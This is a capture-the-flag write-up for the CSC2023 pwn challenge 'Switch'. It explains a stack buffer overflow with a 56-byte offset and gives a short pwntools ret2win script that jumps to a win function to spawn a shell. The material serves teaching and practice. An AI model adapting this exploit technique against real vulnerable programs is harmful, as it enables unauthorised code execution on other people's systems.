CSC2023 - [Pwn] - Switch

Challenge Description

some sort of switching is possible. Don't know where it is possible

Solution

First of all in the binary we would check its protections

NX is enabled we can not execute shellcode in stack

Good thing is that there is No PIE which means we can move to other functions using ret2win technique

Lets run the binary and check its behaviour

It takes input from user and manipulates his age

let us give it large input to check if there is condition of buffer overflow

When we have given it large input then segmentation fault occurred which shows that there is buffer overflow At this point we need to find offset after which we would overwrite the return address

Offset is 56

we need to check other functions in the binary to which we would move

lets check win function

there is a syscall execve which takes /bin/sh as first argument in rdi which shows that it would directly give us shell

so we have to all the things to make a script for getting a shell

Script

from pwn import *
elf = context.binary = ELF('./switchpwn')
 
io = process()
 
payload = cyclic(56) + pack(elf.sym.win)
io.sendline(payload)
io.interactive()

Shell

Finally we got shell

Writeups 2023 © RootxRAN.